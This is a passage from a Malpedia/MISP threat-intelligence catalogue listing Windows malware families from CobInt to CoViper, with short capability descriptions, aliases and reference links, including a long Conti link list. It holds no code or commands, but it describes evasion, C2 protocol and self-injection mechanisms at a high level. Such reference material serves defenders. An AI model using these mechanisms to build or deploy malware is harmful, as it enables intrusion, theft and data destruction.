https://blog.fox-it.com/2019/02/26/identifying-cobalt-strike-team-servers-in-the-wild/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang

https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9

https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/

CobInt

CobInt, is a self-developed backdoor of the Cobalt group. The modular tool has capabilities to collect initial intelligence information about the compromised machine and stream video from its desktop. If the operator decides that the system is of interest, the backdoor will download and launch CobaltStrike framework stager. It’s CRM mailslot module was also observed being downloaded by ISFB.

The tag is: misp-galaxy:malpedia="CobInt"

CobInt is also known as:

  • COOLPANTS

Table 3176. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint

https://www.netscout.com/blog/asert/double-infection-double-fun

https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-3-cobint

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

http://www.secureworks.com/research/threat-profiles/gold-kingswood

https://www.secureworks.com/research/threat-profiles/gold-kingswood

https://www.group-ib.com/blog/renaissance

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/cobalt_upd_ttps/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://asert.arbornetworks.com/double-the-infection-double-the-fun/

CockBlocker

The tag is: misp-galaxy:malpedia="CockBlocker"

CockBlocker is also known as:

Table 3178. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cockblocker

https://twitter.com/JaromirHorejsi/status/817311664391524352

CodeKey

The tag is: misp-galaxy:malpedia="CodeKey"

CodeKey is also known as:

Table 3179. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.codekey

https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf

CodeCore

Ransomware.

The tag is: misp-galaxy:malpedia="CodeCore"

CodeCore is also known as:

Table 3180. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.code_core

https://medium.com/s2wblog/%E5%8F%98%E8%84%B8-teng-snake-a-k-a-code-core-8c35268b4d1a

Coinminer

Coinminer is an unwanted malicious software which uses the victim’s computational power (CPU and RAM mostly) to mine for coins (for example Monero or Zcash). The malware achieves persistence by adding one of the opensource miners on startup without the victim’s consensus. Most sophisticated coin miners use timer settings or cap the CPU usage in order to remain stealthy.

The tag is: misp-galaxy:malpedia="Coinminer"

Coinminer is also known as:

Table 3182. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer

https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/

https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html

https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/

https://secrary.com/ReversingMalware/CoinMiner/

https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://www.triskelelabs.com/investigating-monero-coin-miner

Cold$eal

Cold$eal is a packer for encrypting (sealing) malware. It contains some AV-evasion techniques as well as some sandbox-detection. It was developed by $@dok (aka Sadok aka Coldseal). It was available as a cryptor service under the url coldseal.us and was later sold as a toolkit consisting of the cryptor and a custom made cryptostub including a FuD garantee backed by free update to the cryptostub. The payload was encrypted using RC4 and added to the cryptostub as a resource. The encryption key itself was stored inside the resource as well. Upon start the cryptostub would extract the key, decrypt the payload and perform a selfinjection using the now decrypted payload. Note: The packed sample provided contains some harmless payload, while the unpacked sample is the bare cryptostub without a payload.

The tag is: misp-galaxy:malpedia="Cold$eal"

Cold$eal is also known as:

  • ColdSeal

Table 3185. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.coldseal

https://www.xylibox.com/2012/01/cracking-coldeal-541-fwb.html

https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/

http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/

https://www.xylibox.com/2012/01/coldeal-situation-is-under-control.html

https://www.youtube.com/watch?v=242Tn0IL2jE

ColdStealer

ColdStealer is a relatively new malicious program that was discovered in 2022. Like many other stealers its main purpose is to steal credentials and information from web browsers, in addition to stealing cryptocurrency wallets, FTP credentials, various files and information about the system such as OS version, system language, processor type and clipboard data. When the infostealer collects information that will be stolen, it saves the information in the ZIP form instead of files in the memory. Doing so will allow the malware to bypass detection as there are no traces of files and execution. The only known method of delivering stolen information to cybercriminals is by sending a ZIP archive to the hardcoded command and control (C2) server.

The tag is: misp-galaxy:malpedia="ColdStealer"

ColdStealer is also known as:

Table 3186. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.coldstealer

https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/

https://asec.ahnlab.com/ko/31703/

https://asec.ahnlab.com/en/32090/

Colibri Loader

According to cloudsek, Colibri Loader is a form of malware designed to facilitate the installation of additional malware types on an already compromised system. This loader employs various techniques to evade detection, such as excluding the Import Address Table (IAT) and utilizing encrypted strings to complicate analysis. Similar to other loader malware, Colibri can be utilized to deploy information-stealing malware, potentially leading to significant loss of sensitive data. As a result, users should exercise caution when encountering unfamiliar files on their systems.

The tag is: misp-galaxy:malpedia="Colibri Loader"

Colibri Loader is also known as:

Table 3187. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.colibri

https://cloudsek.com/in-depth-technical-analysis-of-colibri-loader-malware/

https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/

https://fr3d.hk/blog/colibri-loader-back-to-basics

https://www.bitsight.com/blog/unpacking-colibri-loader-russian-apt-linked-campaign

https://github.com/Casperinous/colibri_loader

https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf

Collection RAT

The tag is: misp-galaxy:malpedia="Collection RAT"

Collection RAT is also known as:

Table 3188. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.collection_rat

https://blog.talosintelligence.com/lazarus-collectionrat/

ComeBacker

ComeBacker was found in a backdoored Visual Studio project that was used to target security researchers in Q4 2020 and early 2021.

It is an HTTP(S) downloader.

It uses the AES CBC cipher implemented through the OpenSSL’s EVP interface for decryption of its configuration, and also for encryption and decryption of the client-server communication.

The parameter names in HTTP POST requests of the client are generated randomly. As the initial connection, the client exchanges the keys with the server via the Diffie–Hellman key agreement protocol for the elliptic curve secp521r1. The client generates a random 32-bytes long private key, and the server responds with its public key in a buffer starting with the wide character "0".

Next, the clients sends the current local time, and the server responds with a buffer containing multiple values separated with the pipe symbol. The typical values are the encrypted payload, the export to execute, and the MD5 hash of the decrypted DLL to verify the authenticity of the payload.

There are variants of ComeBacker without statically linked OpenSSL. In that case, the key exchange is omitted and AES CBC is replaced with HC-256.

The tag is: misp-galaxy:malpedia="ComeBacker"

ComeBacker is also known as:

Table 3193. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.comebacker

http://blog.nsfocus.net/stumbzarus-apt-lazarus/

https://cn.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf

https://download.hauri.net/DownSource/down/dwn_detail_down.html?uid=55

https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/

https://norfolkinfosec.com/dprk-malware-targeting-security-researchers/

https://www.anquanke.com/post/id/230161

https://norfolkinfosec.com/dprk-targeting-researchers-ii-sys-payload-and-registry-hunting/

https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/

https://www.comae.com/posts/pandorabox-north-koreans-target-security-researchers/

Comfoo

The tag is: misp-galaxy:malpedia="Comfoo"

Comfoo is also known as:

Table 3194. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.comfoo

https://www.secureworks.com/research/secrets-of-the-comfoo-masters

ComLook

ComLook is a malicious plugin for the mail client "The Bat!", written in C++ and compiled with MSVC 10.0. It implements malicious commands like PutFile, GetFile, SetConfig, GetConfig, and Command. It contains hard-coded email addresses and other information, indicating a target in Azerbaijan. It was first uploaded to VirusTotal on January 12, 2022, and is associated with the APT group Turla. It appears to be a targeted deployment.

The tag is: misp-galaxy:malpedia="ComLook"

ComLook is also known as:

Table 3195. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.comlook

https://twitter.com/ClearskySec/status/1484211242474561540

https://www.msreverseengineering.com/blog/2022/1/25/an-exhaustively-analyzed-idb-for-comlook

ComradeCircle

The tag is: misp-galaxy:malpedia="ComradeCircle"

ComradeCircle is also known as:

Table 3200. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.comrade_circle

https://twitter.com/struppigel/status/816926371867926528

Conti (Windows)

Conti is an extremely damaging ransomware due to the speed with which it encrypts data and spreads to other systems. It was first observed in 2020 and it is thought to be led by a Russia-based cybercrime group that goes under the Wizard Spider pseudonym. In early May 2022, the US government announced a reward of up to $10 million for information on the Conti ransomware gang.

The tag is: misp-galaxy:malpedia="Conti (Windows)"

Conti (Windows) is also known as:

Table 3204. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.conti

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://cocomelonc.github.io/investigation/2022/03/27/malw-inv-conti-1.html

https://www.youtube.com/watch?v=hmaWy9QIC7c

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf

https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/

https://blog.talosintelligence.com/2022/05/conti-and-hive-ransomware-operations.html

https://www.bleepingcomputer.com/news/security/hhs-conti-ransomware-encrypted-80-percent-of-irelands-hse-it-systems/

https://news.sophos.com/en-us/2022/02/22/cyberthreats-during-russian-ukrainian-tensions-what-can-we-learn-from-history-to-be-prepared/

https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLPCLEAR-Staubmann-Busy-Bees.pptx

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/

https://unit42.paloaltonetworks.com/conti-ransomware-gang/

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf

https://news.sophos.com/en-us/2022/02/28/conti-and-karma-actors-attack-healthcare-provider-at-same-time-through-proxyshell-exploits/?cmp=30728

https://www.trmlabs.com/post/analysis-corroborates-suspected-ties-between-conti-and-ryuk-ransomware-groups-and-wizard-spider

https://www.prevailion.com/what-wicked-webs-we-unweave/

https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks

https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.zscaler.com/blogs/security-research/conti-ransomware-attacks-persist-updated-version-despite-leaks

https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked

https://intel471.com/blog/conti-leaks-cybercrime-fire-team

https://us-cert.cisa.gov/ncas/alerts/aa21-265a

https://medium.com/@lcam/lighting-the-exfiltration-infrastructure-of-a-lockbit-affiliate-and-more-f57fbb7a4e79

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/

https://www.bleepingcomputer.com/news/security/conti-ransomware-gang-takes-over-trickbot-malware-operation/

https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/

https://www.mbsd.jp/research/20210413/conti-ransomware/

https://arcticwolf.com/resources/blog/conti-ransomware-leak-analyzed

https://www.elliptic.co/blog/conti-ransomware-nets-at-least-25.5-million-in-four-months

https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement

https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf

https://github.com/cdong1012/ContiUnpacker

https://www.bankinfosecurity.com/cybercrime-moves-conti-ransomware-absorbs-trickbot-malware-a-18573

https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware

https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel

https://medium.com/@arnozobec/analyzing-conti-leaks-without-speaking-russian-only-methodology-f5aecc594d1b

https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/

https://www.esentire.com/blog/analysis-of-leaked-conti-intrusion-procedures-by-esentires-threat-response-unit-tru

https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html

https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/

https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape

https://www.silentpush.com/blog/consequences-the-conti-leaks-and-future-problems

https://www.hse.ie/eng/services/publications/conti-cyber-attack-on-the-hse-full-report.pdf

https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf

https://news.sophos.com/en-us/2021/02/16/what-to-expect-when-youve-been-hit-with-conti-ransomware/

https://twitter.com/TheDFIRReport/status/1498642512935800833

https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf

https://thedfirreport.com/2021/05/12/conti-ransomware/

https://damonmccoy.com/papers/Ransomware_eCrime22.pdf

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks

https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022

http://chuongdong.com/reverse%20engineering/2020/12/15/ContiRansomware/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf

https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles

https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/

https://www.bleepingcomputer.com/news/security/angry-conti-ransomware-affiliate-leaks-gangs-attack-playbook/

https://www.connectwise.com/resources/conti-profile

https://www.darktrace.com/en/blog/the-double-extortion-business-conti-ransomware-gang-finds-new-avenues-of-negotiation/

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v

https://assets.sentinelone.com/ransomware-enterprise/conti-ransomware-unpacked

https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf

https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html

https://news.sophos.com/en-us/2021/02/16/conti-ransomware-attack-day-by-day/

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf?1651576098

https://twitter.com/AltShiftPrtScn/status/1417849181012647938

https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://cocomelonc.github.io/investigation/2022/04/11/malw-inv-conti-2.html

https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/

https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations

https://yoroi.company/research/conti-ransomware-source-code-a-well-designed-cots-ransomware/

https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/

https://www.bleepingcomputer.com/news/security/conti-ransomwares-internal-chats-leaked-after-siding-with-russia/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://medium.com/cycraft/the-road-to-ransomware-resilience-c1ca37036efd

https://www.youtube.com/watch?v=uORuVVQzZ0A

https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships

https://www.advintel.io/post/hydra-with-three-heads-blackbyte-the-future-of-ransomware-subsidiary-groups

https://www.ironnet.com/blog/ransomware-graphic-blog

https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://strapi.eurepoc.eu/uploads/Eu_Repo_C_APT_profile_Conti_Wizard_Spider_dc2a733e18.pdf

https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti

https://cluster25.io/2022/03/02/contis-source-code-deep-dive-into/

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

https://www.eldiario.es/tecnologia/capos-cibercrimen-avisan-contratacaran-si-hackea-rusia_1_8795458.html

https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-powershell-proxyshell-conti-ttps-oh-my

https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire

https://github.com/whichbuffer/Conti-Ransomware-IOC

https://blogs.vmware.com/security/2022/09/threat-report-illuminating-volume-shadow-deletion.html

https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf

https://www.bleepingcomputer.com/news/security/ryuk-successor-conti-ransomware-releases-data-leak-site/

https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware

https://0xthreatintel.medium.com/reversing-conti-ransomware-bfce15019e74

https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/

https://www.bleepingcomputer.com/news/security/hackers-use-contis-leaked-ransomware-to-attack-russian-companies/

https://arcticwolf.com/resources/blog/karakurt-web

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-group-targets-esxi-hypervisors-with-its-linux-variant.html

https://github.com/TheParmak/conti-leaks-englished

https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html

https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/

https://www.secureworks.com/blog/gold-ulrick-continues-conti-operations-despite-public-disclosures

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf

https://www.crowdstrike.com/blog/wizard-spider-adversary-update/

https://www.justice.gov/opa/pr/multiple-foreign-nationals-charged-connection-trickbot-malware-and-conti-ransomware

https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf

https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/

https://therecord.media/conti-leaks-the-panama-papers-of-ransomware/

https://therecord.media/disgruntled-ransomware-affiliate-leaks-the-conti-gangs-technical-manuals/

https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider

https://twitter.com/AltShiftPrtScn/status/1350755169965924352

https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/

https://www.mbsd.jp/2022/03/08/assets/images/MBSD_Summary_of_ContiLeaks_Rev3.pdf

https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html

https://securityaffairs.co/wordpress/128190/cyber-crime/conti-ransomware-takes-over-trickbot.html

https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/

https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/

https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/

https://www.threatstop.com/blog/conti-ransomware-source-code-leaked

https://krebsonsecurity.com/2021/10/conti-ransom-gang-starts-selling-access-to-victims/

https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf

https://securelist.com/modern-ransomware-groups-ttps/106824/

https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/

https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/

https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/

https://github.com/EmissarySpider/ransomware-descendants

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-sound-of-malware.html

https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/

https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://securityaffairs.com/141666/cyber-crime/lockbit-green-ransomware-variant.html

https://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html

https://therecord.media/conti-ransomware-gang-chats-leaked-by-pro-ukraine-member/

https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-1

https://medium.com/@whickey000/how-i-cracked-conti-ransomware-groups-leaked-source-code-zip-file-e15d54663a8

https://intel471.com/blog/conti-emotet-ransomware-conti-leaks

https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-2

https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/

https://www.coveware.com/blog/2022/1/26/ransomware-as-a-service-innovation-curve

https://thedfirreport.com/2021/12/13/diavol-ransomware/

https://marcoramilli.com/2021/11/07/conti-ransomware-cheat-sheet/

https://lifars.com/wp-content/uploads/2021/10/ContiRansomware_Whitepaper.pdf

https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks

https://redcanary.com/blog/intelligence-insights-november-2021/

https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx

https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound

https://www.ic3.gov/Media/News/2021/210521.pdf

https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one

https://news.sophos.com/en-us/2021/02/16/conti-ransomware-evasive-by-nature/

https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/

https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/

https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/

https://nakedsecurity.sophos.com/2021/08/06/conti-ransomware-affiliate-goes-rogue-leaks-company-data/

https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again

https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti

https://cyware.com/news/ransomware-becomes-deadlier-conti-makes-the-most-money-39e17bae/

https://share.vx-underground.org/Conti/

https://www.bleepingcomputer.com/news/security/conti-ransomware-source-code-leaked-by-ukrainian-researcher/

https://intel471.com/blog/conti-vs-monti-a-reinvention-or-just-a-simple-rebranding

https://blog.qualys.com/vulnerabilities-threat-research/2021/11/18/conti-ransomware

https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65

https://research.checkpoint.com/2022/leaks-of-conti-ransomware-group-paint-picture-of-a-surprisingly-normal-tech-start-up-sort-of/

https://www.advintel.io/post/24-hours-from-log4shell-to-local-admin-deep-dive-into-conti-gang-attack-on-fortune-500-dfir

https://cocomelonc.github.io/malware/2023/02/10/malware-analysis-8.html

https://threatpost.com/affiliate-leaks-conti-ransomware-playbook/168442/

https://www.prodaft.com/m/reports/Conti_TLPWHITE_v1.6_WVcSEtc.pdf

https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger

https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html

https://arcticwolf.com/resources/blog/conti-and-akira-chained-together/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf

https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/

https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/

https://www.redhotcyber.com/post/il-ransomware-conti-si-schiera-a-favore-della-russia

https://www.youtube.com/watch?v=cYx7sQRbjGA

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti

https://blog.talosintelligence.com/2021/09/Conti-leak-translation.html

https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox

https://securelist.com/luna-black-basta-ransomware/106950

https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf

https://intel471.com/blog/shipping-companies-ransomware-credentials

https://thehackernews.com/2022/05/malware-analysis-trickbot.html

https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/

https://www.dragos.com/blog/industry-news/suspected-conti-ransomware-activity-in-the-auto-manufacturing-sector/

https://www.cyberscoop.com/ransomware-gang-conti-bounced-back/

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.bleepingcomputer.com/news/security/taiwanese-apple-and-tesla-contractor-hit-by-conti-ransomware/

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf

https://twitter.com/AltShiftPrtScn/status/1423188974298861571

Contopee

FireEye described this malware as a proxy-aware backdoor that communicates using a custom-encrypted binary protocol. It may use the registry to store optional configuration data. The backdoor has been observed to support 26 commands that include directory traversal, file system manipulation, data archival and transmission, and command execution.

The tag is: misp-galaxy:malpedia="Contopee"

Contopee is also known as:

  • WHITEOUT

Table 3205. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee

https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks

https://content.fireeye.com/apt/rpt-apt38

https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks

CopperStealer

According to PCRIsk, CopperStealer, also known as Mingloa, is a malicious program designed to steal sensitive/personal information. It also has the capability to cause chain infections (i.e., download/install additional malware).

Significant activity of CopperStealer has been observed in Brazil, India, Indonesia, Pakistan, and the Philippines. At the time of research, this malware had been noted being spread via websites offering illegal activation tools ("cracks") for licensed software products.

The tag is: misp-galaxy:malpedia="CopperStealer"

CopperStealer is also known as:

  • Mingloa

Table 3207. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.copper_stealer

https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft

https://www.trendmicro.com/en_us/research/22/h/copperstealer-distributes-malicious-chromium-browser-extension-steal-cryptocurrencies.html

CoronaVirus Ransomware

The tag is: misp-galaxy:malpedia="CoronaVirus Ransomware"

CoronaVirus Ransomware is also known as:

  • CoronaVirus Cover-Ransomware

Table 3211. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.coronavirus_ransomware

https://id-ransomware.blogspot.com/2020/03/coronavirus-ransomware.html

Cova

The tag is: misp-galaxy:malpedia="Cova"

Cova is also known as:

Table 3214. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cova

https://www.bitsight.com/blog/cova-and-nosu-new-loader-spreads-new-stealer

Covicli

Covicli is a modified SSLeay32 dynamic library designated as a backdoor. The dynamic library allows the attacker to communicate with the C2 over openSSL.

The tag is: misp-galaxy:malpedia="Covicli"

Covicli is also known as:

  • Covically

Table 3215. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.covicli

https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf

Covid22

Destructive "joke" malware that ultimately deploys a wiper for the MBR.

The tag is: misp-galaxy:malpedia="Covid22"

Covid22 is also known as:

Table 3216. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.covid22

https://www.fortinet.com/blog/threat-research/to-joke-or-not-to-joke-covid-22-brings-disaster-to-mbr

CoViper

PCRisk notes that CoViper is yet another Coronavirus/COVID-19-themed malware infection, most likely proliferated as a file related to the pandemic. It operates by rewriting the system Master Boot Record (MBR). It does not delete the original, but rather creates a backup and replaces it with a custom MBR.

Typically, malicious software that modifies MBRs do so to prevent the Operating System (OS) from being booted (i.e., started). It also displays a screen-encompassing message, often containing a ransom message - this disables user access to the device.

The tag is: misp-galaxy:malpedia="CoViper"

CoViper is also known as:

Table 3217. Table References

Links

